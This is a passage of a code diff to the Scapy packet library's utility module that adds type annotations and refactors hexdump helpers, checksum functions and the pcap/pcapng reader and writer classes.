scapy""" if not conf.interactive or not os.path.isfile(sys.argv[0]): raise OSError("Scapy was not started from console") @@ -210,15 +246,16 @@ def lhex(x): @conf.commands.register -def hexdump(x, dump=False): +def hexdump(p, dump=False): + # type: (Union[Packet, AnyStr], bool) -> Optional[str] """Build a tcpdump like hexadecimal view - :param x: a Packet + :param p: a Packet :param dump: define if the result must be printed or returned in a variable :return: a String only when dump=True """ s = "" - x = bytes_encode(x) + x = bytes_encode(p) x_len = len(x) i = 0 while i < x_len: @@ -228,7 +265,7 @@ def hexdump(x, dump=False): s += "%02X " % orb(x[i + j]) else: s += " " - s += " %s\n" % sane_color(x[i:i + 16]) + s += " %s\n" % sane(x[i:i + 16], color=True) i += 16 # remove trailing \n s = s[:-1] if s.endswith("\n") else s @@ -236,76 +273,83 @@ def hexdump(x, dump=False): return s else: print(s) + return None @conf.commands.register -def linehexdump(x, onlyasc=0, onlyhex=0, dump=False): +def linehexdump(p, onlyasc=0, onlyhex=0, dump=False): + # type: (Union[Packet, AnyStr], int, int, bool) -> Optional[str] """Build an equivalent view of hexdump() on a single line Note that setting both onlyasc and onlyhex to 1 results in a empty output - :param x: a Packet + :param p: a Packet :param onlyasc: 1 to display only the ascii view :param onlyhex: 1 to display only the hexadecimal view :param dump: print the view if False :return: a String only when dump=True """ s = "" - s = hexstr(x, onlyasc=onlyasc, onlyhex=onlyhex, color=not dump) + s = hexstr(p, onlyasc=onlyasc, onlyhex=onlyhex, color=not dump) if dump: return s else: print(s) + return None @conf.commands.register -def chexdump(x, dump=False): +def chexdump(p, dump=False): + # type: (Union[Packet, AnyStr], bool) -> Optional[str] """Build a per byte hexadecimal representation Example: >>> chexdump(IP()) 0x45, 0x00, 0x00, 0x14, 0x00, 0x01, 0x00, 0x00, 0x40, 0x00, 0x7c, 0xe7, 0x7f, 0x00, 0x00, 0x01, 0x7f, 0x00, 0x00, 0x01 # noqa: E501 - :param x: a Packet + :param p: a Packet :param dump: print the view if False :return: a String only if dump=True """ - x = bytes_encode(x) + x = bytes_encode(p) s = ", ".join("%#04x" % orb(x) for x in x) if dump: return s else: print(s) + return None @conf.commands.register -def hexstr(x, onlyasc=0, onlyhex=0, color=False): +def hexstr(p, onlyasc=0, onlyhex=0, color=False): + # type: (Union[Packet, AnyStr], int, int, bool) -> str """Build a fancy tcpdump like hex from bytes.""" - x = bytes_encode(x) - _sane_func = sane_color if color else sane + x = bytes_encode(p) s = [] if not onlyasc: s.append(" ".join("%02X" % orb(b) for b in x)) if not onlyhex: - s.append(_sane_func(x)) + s.append(sane(x, color=color)) return " ".join(s) def repr_hex(s): + # type: (bytes) -> str """ Convert provided bitstring to a simple string of hex digits """ return "".join("%02x" % orb(x) for x in s) @conf.commands.register -def hexdiff(x, y, autojunk=False): +def hexdiff(a, b, autojunk=False): + # type: (Union[Packet, AnyStr], Union[Packet, AnyStr], bool) -> None """ Show differences between 2 binary strings, Packets... For the autojunk parameter, see https://docs.python.org/3.8/library/difflib.html#difflib.SequenceMatcher - :param x: - :param y: The binary strings, packets... to compare + :param a: + :param b: The binary strings, packets... to compare :param autojunk: Setting it to True will likely increase the comparison speed a lot on big byte strings, but will reduce accuracy (will tend to miss insertion and see replacements instead for instance). @@ -313,33 +357,33 @@ def hexdiff(x, y, autojunk=False): # Compare the strings using difflib - x = bytes_encode(x) - y = bytes_encode(y) + xb = bytes_encode(a) + yb = bytes_encode(b) - sm = difflib.SequenceMatcher(a=x, b=y, autojunk=autojunk) - x = [x[i:i + 1] for i in range(len(x))] - y = [y[i:i + 1] for i in range(len(y))] + sm = difflib.SequenceMatcher(a=xb, b=yb, autojunk=autojunk) + xarr = [xb[i:i + 1] for i in range(len(xb))] + yarr = [yb[i:i + 1] for i in range(len(yb))] backtrackx = [] backtracky = [] for opcode in sm.get_opcodes(): typ, x0, x1, y0, y1 = opcode if typ == 'delete': - backtrackx += x[x0:x1] - backtracky += [''] * (x1 - x0) + backtrackx += xarr[x0:x1] + backtracky += [b''] * (x1 - x0) elif typ == 'insert': - backtrackx += [''] * (y1 - y0) - backtracky += y[y0:y1] + backtrackx += [b''] * (y1 - y0) + backtracky += yarr[y0:y1] elif typ in ['equal', 'replace']: - backtrackx += x[x0:x1] - backtracky += y[y0:y1] + backtrackx += xarr[x0:x1] + backtracky += yarr[y0:y1] if autojunk: # Some lines may have been considered as junk. Check the sizes lbx = len(backtrackx) lby = len(backtracky) - backtrackx += [''] * (max(lbx, lby) - lbx) - backtracky += [''] * (max(lbx, lby) - lby) + backtrackx += [b''] * (max(lbx, lby) - lbx) + backtracky += [b''] * (max(lbx, lby) - lby) # Print the diff @@ -394,7 +438,7 @@ def hexdiff(x, y, autojunk=False): col = colorize[(linex[j] != liney[j]) * (doy - dox)] print(col("%02X" % orb(line[j])), end=' ') if linex[j] == liney[j]: - cl += sane_color(line[j]) + cl += sane(line[j], color=True) else: cl += col(sane(line[j])) else: @@ -420,12 +464,13 @@ def hexdiff(x, y, autojunk=False): if struct.pack("H", 1) == b"\x00\x01": # big endian - checksum_endian_transform = lambda chk: chk + checksum_endian_transform = lambda chk: chk # type: Callable[[int], int] else: checksum_endian_transform = lambda chk: ((chk >> 8) & 0xff) | chk << 8 def checksum(pkt): + # type: (bytes) -> int if len(pkt) % 2 == 1: pkt += b"\0" s = sum(array.array("H", pkt)) @@ -436,6 +481,7 @@ def checksum(pkt): def _fletcher16(charbuf): + # type: (bytes) -> Tuple[int, int] # This is based on the GPLed C implementation in Zebra # noqa: E501 c0 = c1 = 0 for char in charbuf: @@ -449,6 +495,7 @@ def _fletcher16(charbuf): @conf.commands.register def fletcher16_checksum(binbuf): + # type: (bytes) -> int """Calculates Fletcher-16 checksum of the given buffer. Note: @@ -461,6 +508,7 @@ def fletcher16_checksum(binbuf): @conf.commands.register def fletcher16_checkbytes(binbuf, offset): + # type: (bytes, int) -> bytes """Calculates the Fletcher-16 checkbytes returned as 2 byte binary-string. Including the bytes into the buffer (at the position marked by offset) the # noqa: E501 @@ -490,10 +538,12 @@ def fletcher16_checkbytes(binbuf, offset): def mac2str(mac): + # type: (str) -> bytes return b"".join(chb(int(x, 16)) for x in plain_str(mac).split(':')) def valid_mac(mac): + # type: (str) -> bool try: return len(mac2str(mac)) == 6 except ValueError: @@ -502,12 +552,14 @@ def valid_mac(mac): def str2mac(s): + # type: (bytes) -> str if isinstance(s, str): return ("%02x:" * 6)[:-1] % tuple(map(ord, s)) return ("%02x:" * 6)[:-1] % tuple(s) def randstring(length): + # type: (int) -> bytes """ Returns a random string of length (length >= 0) """ @@ -516,6 +568,7 @@ def randstring(length): def zerofree_randstring(length): + # type: (int) -> bytes """ Returns a random string of length (length >= 0) without zero in it. """ @@ -524,6 +577,7 @@ def zerofree_randstring(length): def strxor(s1, s2): + # type: (bytes, bytes) -> bytes """ Returns the binary XOR of the 2 provided strings s1 and s2. s1 and s2 must be of same length. @@ -532,6 +586,7 @@ def strxor(s1, s2): def strand(s1, s2): + # type: (bytes, bytes) -> bytes """ Returns the binary AND of the 2 provided strings s1 and s2. s1 and s2 must be of same length. @@ -543,11 +598,12 @@ def strand(s1, s2): try: socket.inet_aton("255.255.255.255") except socket.error: - def inet_aton(x): - if x == "255.255.255.255": + def inet_aton(ip_string): + # type: (str) -> bytes + if ip_string == "255.255.255.255": return b"\xff" * 4 else: - return socket.inet_aton(x) + return socket.inet_aton(ip_string) else: inet_aton = socket.inet_aton @@ -555,14 +611,16 @@ def inet_aton(x): def atol(x): + # type: (str) -> int try: ip = inet_aton(x) except socket.error: ip = inet_aton(socket.gethostbyname(x)) - return struct.unpack("!I", ip)[0] + return cast(int, struct.unpack("!I", ip)[0]) def valid_ip(addr): + # type: (str) -> bool try: addr = plain_str(addr) except UnicodeDecodeError: @@ -575,6 +633,7 @@ def valid_ip(addr): def valid_net(addr): + # type: (str) -> bool try: addr = plain_str(addr) except UnicodeDecodeError: @@ -586,6 +645,7 @@ def valid_net(addr): def valid_ip6(addr): + # type: (str) -> bool try: addr = plain_str(addr) except UnicodeDecodeError: @@ -601,6 +661,7 @@ def valid_ip6(addr): def valid_net6(addr): + # type: (str) -> bool try: addr = plain_str(addr) except UnicodeDecodeError: @@ -614,13 +675,16 @@ def valid_net6(addr): if WINDOWS_XP: # That is a hell of compatibility :( def ltoa(x): + # type: (int) -> str return inet_ntoa(struct.pack(" str return inet_ntoa(struct.pack("!I", x & 0xffffffff)) def itom(x): + # type: (int) -> int return (0xffffffff00000000 >> x) & 0xffffffff @@ -637,15 +701,22 @@ class ContextManagerSubprocess(object): """ def __init__(self, prog, suppress=True): + # type: (str, bool) -> None self.prog = prog self.suppress = suppress def __enter__(self): + # type: () -> None pass - def __exit__(self, exc_type, exc_value, traceback): - if exc_value is None: - return + def __exit__(self, + exc_type, # type: Optional[type] + exc_value, # type: Optional[Exception] + traceback, # type: Optional[Any] + ): + # type: (...) -> Optional[bool] + if exc_value is None or exc_type is None: + return None # Errored if isinstance(exc_value, EnvironmentError): msg = "Could not execute %s, is it installed?" % self.prog @@ -671,6 +742,7 @@ class ContextManagerCaptureOutput(object): """ def __init__(self): + # type: () -> None self.result_export_object = "" try: import mock # noqa: F401 @@ -678,9 +750,11 @@ def __init__(self): raise ImportError("The mock module needs to be installed !") def __enter__(self): + # type: () -> ContextManagerCaptureOutput import mock def write(s, decorator=self): + # type: (str, ContextManagerCaptureOutput) -> None decorator.result_export_object += s mock_stdout = mock.Mock() mock_stdout.write = write @@ -689,17 +763,27 @@ def write(s, decorator=self): return self def __exit__(self, *exc): + # type: (*Any) -> Literal[False] sys.stdout = self.bck_stdout return False def get_output(self, eval_bytes=False): + # type: (bool) -> str if self.result_export_object.startswith("b'") and eval_bytes: return plain_str(eval(self.result_export_object)) return self.result_export_object -def do_graph(graph, prog=None, format=None, target=None, type=None, - string=None, options=None): +def do_graph( + graph, # type: str + prog=None, # type: Optional[str] + format=None, # type: Optional[str] + target=None, # type: Optional[Union[IO[bytes], str]] + type=None, # type: Optional[str] + string=None, # type: Optional[bool] + options=None # type: Optional[List[str]] +): + # type: (...) -> Optional[str] """Processes graph description using an external software. This method is used to convert a graphviz format to an image. @@ -744,6 +828,7 @@ def do_graph(graph, prog=None, format=None, target=None, type=None, target = open(target[1:].lstrip(), "wb") else: target = open(os.path.abspath(target), "wb") + target = cast(IO[bytes], target) proc = subprocess.Popen( "\"%s\" %s %s" % (prog, options or "", format or ""), shell=True, stdin=subprocess.PIPE, stdout=target, @@ -769,10 +854,11 @@ def do_graph(graph, prog=None, format=None, target=None, type=None, break else: if conf.prog.display == conf.prog._default: - os.startfile(target.name) + os.startfile(target.name) # type: ignore else: with ContextManagerSubprocess(conf.prog.display): subprocess.Popen([conf.prog.display, target.name]) + return None _TEX_TR = { @@ -793,13 +879,17 @@ def do_graph(graph, prog=None, format=None, target=None, type=None, def tex_escape(x): + # type: (str) -> str s = "" for c in x: s += _TEX_TR.get(c, c) return s -def colgen(*lstcol, **kargs): +def colgen(*lstcol, # type: Any + **kargs # type: Any + ): + # type: (...) -> Iterator[Any] """Returns a generator that mixes provided quantities forever trans: a function to convert the three arguments into a color. lambda x,y,z:(x,y,z) by default""" # noqa: E501 if len(lstcol) < 2: @@ -814,16 +904,19 @@ def colgen(*lstcol, **kargs): def incremental_label(label="tag%05i", start=0): + # type: (str, int) -> Iterator[str] while True: yield label % start start += 1 def binrepr(val): + # type: (int) -> str return bin(val)[2:] def long_converter(s): + # type: (str) -> int return int(s.replace('\n', '').replace(' ', ''), 16) ######################### @@ -832,34 +925,41 @@ def long_converter(s): class EnumElement: - _value = None - def __init__(self, key, value): + # type: (str, int) -> None self._key = key self._value = value def __repr__(self): + # type: () -> str return "<%s %s[%r]>" % (self.__dict__.get("_name", self.__class__.__name__), self._key, self._value) # noqa: E501 def __getattr__(self, attr): + # type: (str) -> Any return getattr(self._value, attr) def __str__(self): + # type: () -> str return self._key def __bytes__(self): + # type: () -> bytes return bytes_encode(self.__str__()) def __hash__(self): + # type: () -> int return self._value def __int__(self): + # type: () -> int return int(self._value) def __eq__(self, other): + # type: (Any) -> bool return self._value == int(other) def __neq__(self, other): + # type: (Any) -> bool return not self.__eq__(other) @@ -867,6 +967,7 @@ class Enum_metaclass(type): element_class = EnumElement def __new__(cls, name, bases, dct): + # type: (Any, str, Any, Dict[str, Any]) -> Any rdict = {} for k, v in six.iteritems(dct): if isinstance(v, int): @@ -877,15 +978,19 @@ def __new__(cls, name, bases, dct): return super(Enum_metaclass, cls).__new__(cls, name, bases, dct) def __getitem__(self, attr): - return self.__rdict__[attr] + # type: (int) -> Any + return self.__rdict__[attr] # type: ignore def __contains__(self, val): - return val in self.__rdict__ + # type: (int) -> bool + return val in self.__rdict__ # type: ignore def get(self, attr, val=None): - return self.__rdict__.get(attr, val) + # type: (str, Optional[Any]) -> Any + return self.__rdict__.get(attr, val) # type: ignore def __repr__(self): + # type: () -> str return "<%s>" % self.__dict__.get("name", self.__name__) @@ -895,16 +1000,21 @@ def __repr__(self): def export_object(obj): - print(bytes_base64(gzip.zlib.compress(six.moves.cPickle.dumps(obj, 2), 9))) + # type: (Any) -> None + import zlib + print(bytes_base64(zlib.compress(six.moves.cPickle.dumps(obj, 2), 9))) def import_object(obj=None): + # type: (Optional[str]) -> Any + import zlib if obj is None: obj = sys.stdin.read() - return six.moves.cPickle.loads(gzip.zlib.decompress(base64_bytes(obj.strip()))) # noqa: E501 + return six.moves.cPickle.loads(zlib.decompress(base64_bytes(obj.strip()))) # noqa: E501 def save_object(fname, obj): + # type: (str, Any) -> None """Pickle a Python object""" fd = gzip.open(fname, "wb") @@ -913,17 +1023,19 @@ def save_object(fname, obj): def load_object(fname): + # type: (str) -> Any """unpickle a Python object""" return six.moves.cPickle.load(gzip.open(fname, "rb")) @conf.commands.register -def corrupt_bytes(s, p=0.01, n=None): +def corrupt_bytes(data, p=0.01, n=None): + # type: (str, float, Optional[int]) -> bytes """ Corrupt a given percentage (at least one byte) or number of bytes from a string """ - s = array.array("B", bytes_encode(s)) + s = array.array("B", bytes_encode(data)) s_len = len(s) if n is None: n = max(1, int(s_len * p)) @@ -933,12 +1045,13 @@ def corrupt_bytes(s, p=0.01, n=None): @conf.commands.register -def corrupt_bits(s, p=0.01, n=None): +def corrupt_bits(data, p=0.01, n=None): + # type: (str, float, Optional[int]) -> bytes """ Flip a given percentage (at least one bit) or number of bits from a string """ - s = array.array("B", bytes_encode(s)) + s = array.array("B", bytes_encode(data)) s_len = len(s) * 8 if n is None: n = max(1, int(s_len * p)) @@ -952,7 +1065,12 @@ def corrupt_bits(s, p=0.01, n=None): ############################# @conf.commands.register -def wrpcap(filename, pkt, *args, **kargs): +def wrpcap(filename, # type: Union[IO[bytes], str] + pkt, # type: _UniPacketList + *args, # type: Any + **kargs # type: Any + ): + # type: (...) -> None """Write a list of packets to a pcap file :param filename: the name of the file to write packets to, or an open, @@ -971,11 +1089,16 @@ def wrpcap(filename, pkt, *args, **kargs): @conf.commands.register def rdpcap(filename, count=-1): + # type: (Union[IO[bytes], str], int) -> PacketList """Read a pcap or pcapng file and return a packet list :param count: read only packets """ - with PcapReader(filename) as fdesc: + # Rant: Our complicated use of metaclasses and especially the + # __call__ function is, of course, not supported by MyPy. + # One day we should simplify this mess and use a much simpler + # layout that will actually be supported and properly dissected. + with PcapReader(filename) as fdesc: # type: ignore return fdesc.read_all(count=count) @@ -983,16 +1106,20 @@ class PcapReader_metaclass(type): """Metaclass for (Raw)Pcap(Ng)Readers""" def __new__(cls, name, bases, dct): + # type: (Any, str, Any, Dict[str, Any]) -> Any """The `alternative` class attribute is declared in the PcapNg variant, and set here to the Pcap variant. """ - newcls = super(PcapReader_metaclass, cls).__new__(cls, name, bases, dct) # noqa: E501 + newcls = super(PcapReader_metaclass, cls).__new__( + cls, name, bases, dct + ) if 'alternative' in dct: dct['alternative'].alternative = newcls return newcls - def __call__(cls, filename): + def __call__(cls, filename): # type: ignore + # type: (Union[IO[bytes], str]) -> Any """Creates a cls instance, use the `alternative` if that fails. @@ -1021,23 +1148,27 @@ def __call__(cls, filename): return i @staticmethod - def open(filename): + def open(fname # type: Union[IO[bytes], str] + ): + # type: (...) -> Tuple[str, _ByteStream, bytes] """Open (if necessary) filename, and read the magic.""" - if isinstance(filename, six.string_types): + if isinstance(fname, str): + filename = fname try: - fdesc = gzip.open(filename, "rb") + fdesc = gzip.open(filename, "rb") # type: _ByteStream magic = fdesc.read(4) except IOError: fdesc = open(filename, "rb") magic = fdesc.read(4) else: - fdesc = filename + fdesc = fname filename = getattr(fdesc, "name", "No name") magic = fdesc.read(4) return filename, fdesc, magic -class RawPcapReader(six.with_metaclass(PcapReader_metaclass)): +@six.add_metaclass(PcapReader_metaclass) +class RawPcapReader: """A stateful pcap reader. Each packet is returned as a string""" nonblocking_socket = True @@ -1045,6 +1176,7 @@ class RawPcapReader(six.with_metaclass(PcapReader_metaclass)): ["sec", "usec", "wirelen", "caplen"]) # noqa: E501 def __init__(self, filename, fdesc, magic): + # type: (str, _ByteStream, bytes) -> None self.filename = filename self.f = fdesc if magic == b"\xa1\xb2\xc3\xd4": # big endian @@ -1073,13 +1205,13 @@ def __init__(self, filename, fdesc, magic): self.snaplen = snaplen def __iter__(self): + # type: () -> RawPcapReader return self def next(self): - """implement the iterator protocol on a set of packets in a pcap file - pkt is a tuple (pkt_data, pkt_metadata) as defined in - RawPcapReader.read_packet() - + # type: () -> Packet + """ + implement the iterator protocol on a set of packets in a pcap file """ try: return self.read_packet() @@ -1087,7 +1219,8 @@ def next(self): raise StopIteration __next__ = next - def read_packet(self, size=MTU): + def _read_packet(self, size=MTU): + # type: (int) -> Tuple[bytes, RawPcapReader.PacketMetadata] """return a single packet read from the file as a tuple containing (pkt_data, pkt_metadata) @@ -1101,7 +1234,17 @@ def read_packet(self, size=MTU): RawPcapReader.PacketMetadata(sec=sec, usec=usec, wirelen=wirelen, caplen=caplen)) - def dispatch(self, callback): + def read_packet(self, size=MTU): + # type: (int) -> Packet + return cast( + Packet, + self._read_packet()[0] + ) + + def dispatch(self, + callback # type: Callable[[Tuple[bytes, RawPcapReader.PacketMetadata]], Any] # noqa: E501 + ): + # type: (...) -> None """call the specified callback routine for each packet read This is just a convenience function for the main loop @@ -1112,46 +1255,62 @@ def dispatch(self, callback): callback(p) def read_all(self, count=-1): + # type: (int) -> PacketList + res = self._read_all(count) + from scapy import plist + return plist.PacketList(res, name=os.path.basename(self.filename)) + + def _read_all(self, count=-1): + # type: (int) -> List[Packet] """return a list of all packets in the pcap file """ - res = [] + res = [] # type: List[Packet] while count != 0: count -= 1 try: - p = self.read_packet() + p = self.read_packet() # type: Packet except EOFError: break res.append(p) return res def recv(self, size=MTU): + # type: (int) -> bytes """ Emulate a socket """ - return self.read_packet(size=size)[0] + return self._read_packet(size=size)[0] def fileno(self): + # type: () -> int return self.f.fileno() def close(self): + # type: () -> Optional[Any] return self.f.close() def __enter__(self): + # type: () -> RawPcapReader return self def __exit__(self, exc_type, exc_value, tracback): + # type: (Optional[Any], Optional[Any], Optional[Any]) -> None self.close() # emulate SuperSocket @staticmethod - def select(sockets, remain=None): + def select(sockets, # type: Dict[RawPcapReader, str] + remain=None, # type: Optional[Any] + ): + # type: (...) -> Tuple[Dict[RawPcapReader, str], None] return sockets, None class PcapReader(RawPcapReader): def __init__(self, filename, fdesc, magic): + # type: (str, IO[bytes], bytes) -> None RawPcapReader.__init__(self, filename, fdesc, magic) try: - self.LLcls = conf.l2types[self.linktype] + self.LLcls = conf.l2types[self.linktype] # type: Packet_metaclass except KeyError: warning("PcapReader: unknown LL type [%i]/[%#x]. Using Raw packets" % (self.linktype, self.linktype)) # noqa: E501 if conf.raw_layer is None: @@ -1160,13 +1319,14 @@ def __init__(self, filename, fdesc, magic): self.LLcls = conf.raw_layer def read_packet(self, size=MTU): - rp = super(PcapReader, self).read_packet(size=size) + # type: (int) -> Packet + rp = super(PcapReader, self)._read_packet(size=size) if rp is None: raise EOFError s, pkt_info = rp try: - p = self.LLcls(s) + p = self.LLcls(s) # type: Packet except KeyboardInterrupt: raise except Exception: @@ -1177,18 +1337,14 @@ def read_packet(self, size=MTU): if conf.raw_layer is None: # conf.raw_layer is set on import import scapy.packet # noqa: F401 - p = conf.raw_layer(s) + p = conf.raw_layer(s) # type: ignore power = Decimal(10) ** Decimal(-9 if self.nano else -6) p.time = EDecimal(pkt_info.sec + power * pkt_info.usec) p.wirelen = pkt_info.wirelen return p - def read_all(self, count=-1): - res = RawPcapReader.read_all(self, count) - from scapy import plist - return plist.PacketList(res, name=os.path.basename(self.filename)) - def recv(self, size=MTU): + # type: (int) -> Packet return self.read_packet(size=size) @@ -1198,17 +1354,18 @@ class RawPcapNgReader(RawPcapReader): """ - alternative = RawPcapReader + alternative = RawPcapReader # type: Type[Any] PacketMetadata = collections.namedtuple("PacketMetadata", ["linktype", "tsresol", "tshigh", "tslow", "wirelen"]) def __init__(self, filename, fdesc, magic): + # type: (str, IO[bytes], bytes) -> None self.filename = filename self.f = fdesc # A list of (linktype, snaplen, tsresol); will be populated by IDBs. - self.interfaces = [] + self.interfaces = [] # type: List[Tuple[int, int, int]] self.default_options = { "tsresol": 1000000 } @@ -1223,7 +1380,7 @@ def __init__(self, filename, fdesc, magic): "Not a pcapng capture file (bad magic: %r)" % magic ) # see https://github.com/pcapng/pcapng - blocklen, magic = self.f.read(4), self.f.read(4) # noqa: F841 + blocklen_, magic = self.f.read(4), self.f.read(4) # noqa: F841 if magic == b"\x1a\x2b\x3c\x4d": self.endian = ">" elif magic == b"\x4d\x3c\x2b\x1a": @@ -1231,7 +1388,7 @@ def __init__(self, filename, fdesc, magic): else: raise Scapy_Exception("Not a pcapng capture file (bad magic)") self.f.read(12) - blocklen = struct.unpack("!I", blocklen)[0] + blocklen = struct.unpack("!I", blocklen_)[0] # type: int # Read default options self.default_options = self.read_options( self.f.read(blocklen - 24) @@ -1241,7 +1398,8 @@ def __init__(self, filename, fdesc, magic): except Exception: pass - def read_packet(self, size=MTU): + def _read_packet(self, size=MTU): # type: ignore + # type: (int) -> Tuple[bytes, RawPcapNgReader.PacketMetadata] """Read blocks until it reaches either EOF or a packet, and returns None or (packet, (linktype, sec, usec, wirelen)), where packet is a string. @@ -1271,6 +1429,7 @@ def read_packet(self, size=MTU): return res def read_options(self, options): + # type: (bytes) -> Dict[str, int] """Section Header Block""" opts = self.default_options.copy() while len(options) >= 4: @@ -1293,12 +1452,17 @@ def read_options(self, options): return opts def read_block_idb(self, block, _): + # type: (bytes, int) -> None """Interface Description Block""" options = self.read_options(block[16:]) - self.interfaces.append(struct.unpack(self.endian + "HxxI", block[:8]) + - (options["tsresol"],)) + interface = struct.unpack( # type: ignore + self.endian + "HxxI", + block[:8] + ) + (options["tsresol"],) # type: Tuple[int, int, int] + self.interfaces.append(interface) def read_block_epb(self, block, size): + # type: (bytes, int) -> Tuple[bytes, RawPcapNgReader.PacketMetadata] """Enhanced Packet Block""" intid, tshigh, tslow, caplen, wirelen = struct.unpack( self.endian + "5I", @@ -1312,6 +1476,7 @@ def read_block_epb(self, block, size): wirelen=wirelen)) def read_block_spb(self, block, size): + # type: (bytes, int) -> Tuple[bytes, RawPcapNgReader.PacketMetadata] """Simple Packet Block""" # "it MUST be assumed that all the Simple Packet Blocks have # been captured on the interface previously specified in the @@ -1327,6 +1492,7 @@ def read_block_spb(self, block, size): wirelen=wirelen)) def read_block_pkt(self, block, size): + # type: (bytes, int) -> Tuple[bytes, RawPcapNgReader.PacketMetadata] """(Obsolete) Packet Block""" intid, drops, tshigh, tslow, caplen, wirelen = struct.unpack( self.endian + "HH4I", @@ -1345,15 +1511,18 @@ class PcapNgReader(RawPcapNgReader): alternative = PcapReader def __init__(self, filename, fdesc, magic): + # type: (str, IO[bytes], bytes) -> None RawPcapNgReader.__init__(self, filename, fdesc, magic) def read_packet(self, size=MTU): - rp = super(PcapNgReader, self).read_packet(size=size) + # type: (int) -> Packet + rp = super(PcapNgReader, self)._read_packet(size=size) if rp is None: raise EOFError s, (linktype, tsresol, tshigh, tslow, wirelen) = rp try: - p = conf.l2types[linktype](s) + cls = conf.l2types[linktype] # type: Packet_metaclass + p = cls(s) # type: Packet except KeyboardInterrupt: raise except Exception: @@ -1362,26 +1531,31 @@ def read_packet(self, size=MTU): if conf.raw_layer is None: # conf.raw_layer is set on import import scapy.packet # noqa: F401 - p = conf.raw_layer(s) + p = conf.raw_layer(s) # type: ignore if tshigh is not None: p.time = EDecimal((tshigh << 32) + tslow) / tsresol p.wirelen = wirelen return p - def read_all(self, count=-1): - res = RawPcapNgReader.read_all(self, count) - from scapy import plist - return plist.PacketList(res, name=os.path.basename(self.filename)) - def recv(self, size=MTU): + # type: (int) -> Packet return self.read_packet() class RawPcapWriter: """A stream PCAP writer with more control than wrpcap()""" - def __init__(self, filename, linktype=None, gz=False, endianness="", - append=False, sync=False, nano=False, snaplen=MTU): + def __init__(self, + filename, # type: Union[IO[bytes], str] + linktype=None, # type: Optional[int] + gz=False, # type: bool + endianness="", # type: str + append=False, # type: bool + sync=False, # type: bool + nano=False, # type: bool + snaplen=MTU, # type: int + ): + # type: (...) -> None """ :param filename: the name of the file to write packets to, or an open, writable file-like object. @@ -1409,17 +1583,28 @@ def __init__(self, filename, linktype=None, gz=False, endianness="", if sync: bufsz = 0 - if isinstance(filename, six.string_types): + if isinstance(filename, str): self.filename = filename - self.f = [open, gzip.open][gz](filename, append and "ab" or "wb", gz and 9 or bufsz) # noqa: E501 + if gz: + self.f = cast(_ByteStream, gzip.open( + filename, append and "ab" or "wb", 9 + )) + else: + self.f = open(filename, append and "ab" or "wb", bufsz) else: self.f = filename self.filename = getattr(filename, "name", "No name") def fileno(self): + # type: () -> int return self.f.fileno() + def write_header(self, pkt): + # type: (Optional[Union[Packet, bytes]]) -> None + return self._write_header(bytes_encode(pkt)) + def _write_header(self, pkt): + # type: (Optional[Union[Packet, bytes]]) -> None self.header_present = 1 if self.append: @@ -1427,15 +1612,22 @@ def _write_header(self, pkt): # safest way to tell whether the header is already present # because we have to handle compressed streams that # are not as flexible as basic files - g = [open, gzip.open][self.gz](self.filename, "rb") - if g.read(16): - return + if self.gz: + g = gzip.open(self.filename, "rb") # type: _ByteStream + else: + g = open(self.filename, "rb") + try: + if g.read(16): + return + finally: + g.close() self.f.write(struct.pack(self.endian + "IHHIIII", 0xa1b23c4d if self.nano else 0xa1b2c3d4, # noqa: E501 2, 4, 0, 0, self.snaplen, self.linktype)) self.f.flush() def write(self, pkt): + # type: (Union[_UniPacketList, bytes]) -> None """ Writes a Packet, a SndRcvList object, or bytes to a pcap file. @@ -1445,25 +1637,25 @@ def write(self, pkt): """ if isinstance(pkt, bytes): if not self.header_present: - self._write_header(pkt) - self._write_packet(pkt) + self.write_header(pkt) + self.write_packet(pkt) else: # Import here to avoid a circular dependency from scapy.plist import SndRcvList if isinstance(pkt, SndRcvList): - def _iter(pkt=pkt): + def _iter(pkt=cast(SndRcvList, pkt)): + # type: (SndRcvList) -> Iterator[Packet] for s, r in pkt: if s.sent_time: s.time = s.sent_time yield s yield r - pkt = _iter() + pkt_iter = _iter() else: - pkt = pkt.__iter__() - for p in pkt: - + pkt_iter = pkt.__iter__() + for p in pkt_iter: if not self.header_present: - self._write_header(p) + self.write_header(p) if self.linktype != conf.l2types.get(type(p), None): warning("Inconsistent linktypes detected!" @@ -1471,10 +1663,30 @@ def _iter(pkt=pkt): " invalid packets." ) - self._write_packet(p) + self.write_packet(p) + + def write_packet(self, + packet, # type: Union[bytes, Packet] + sec=None, # type: Optional[int] + usec=None, # type: Optional[int] + caplen=None, # type: Optional[int] + wirelen=None, # type: Optional[int] + ): + # type: (...) -> None + self._write_packet( + bytes(packet), + sec=sec, usec=usec, + caplen=caplen, wirelen=wirelen + ) - def _write_packet(self, packet, sec=None, usec=None, caplen=None, - wirelen=None): + def _write_packet(self, + packet, # type: bytes + sec=None, # type: Optional[int] + usec=None, # type: Optional[int] + caplen=None, # type: Optional[int] + wirelen=None # type: Optional[int] + ): + # type: (...) -> None """ Writes a single packet to the pcap file. @@ -1518,17 +1730,21 @@ def _write_packet(self, packet, sec=None, usec=None, caplen=None, self.f.flush() def flush(self): + # type: () -> Optional[Any] return self.f.flush() def close(self): + # type: () -> Optional[Any] if not self.header_present: - self._write_header(None) + self.write_header(None) return self.f.close() def __enter__(self): + # type: () -> RawPcapWriter return self def __exit__(self, exc_type, exc_value, tracback): + # type: (Optional[Any], Optional[Any], Optional[Any]) -> None self.flush() self.close() @@ -1536,7 +1752,8 @@ def __exit__(self, exc_type, exc_value, tracback): class PcapWriter(RawPcapWriter): """A stream PCAP writer with more control than wrpcap()""" - def _write_header(self, pkt): + def write_header(self, pkt): + # type: (Optional[Union[Packet, bytes]]) -> None if self.linktype is None: try: self.linktype = conf.l2types[pkt.__class__] @@ -1548,10 +1765,16 @@ def _write_header(self, pkt): except KeyError: warning("PcapWriter: unknown LL type for %s. Using type 1 (Ethernet)", pkt.__class__.__name__) # noqa: E501 self.linktype = DLT_EN10MB - RawPcapWriter._write_header(self, pkt) - - def _write_packet(self, packet, sec=None, usec=None, caplen=None, - wirelen=None): + self._write_header(pkt) + + def write_packet(self, + packet, # type: Union[bytes, Packet] + sec=None, # type: Optional[int] + usec=None, # type: Optional[int] + caplen=None, # type: Optional[int] + wirelen=None, # type: Optional[int] + ): + # type: (...) -> None """ Writes a single packet to the pcap file. @@ -1578,27 +1801,31 @@ def _write_packet(self, packet, sec=None, usec=None, caplen=None, """ if hasattr(packet, "time"): if sec is None: - sec = int(packet.time) - usec = int(round((packet.time - sec) * + sec = int(packet.time) # type: ignore + usec = int(round((packet.time - sec) * # type: ignore (1000000000 if self.nano else 1000000))) 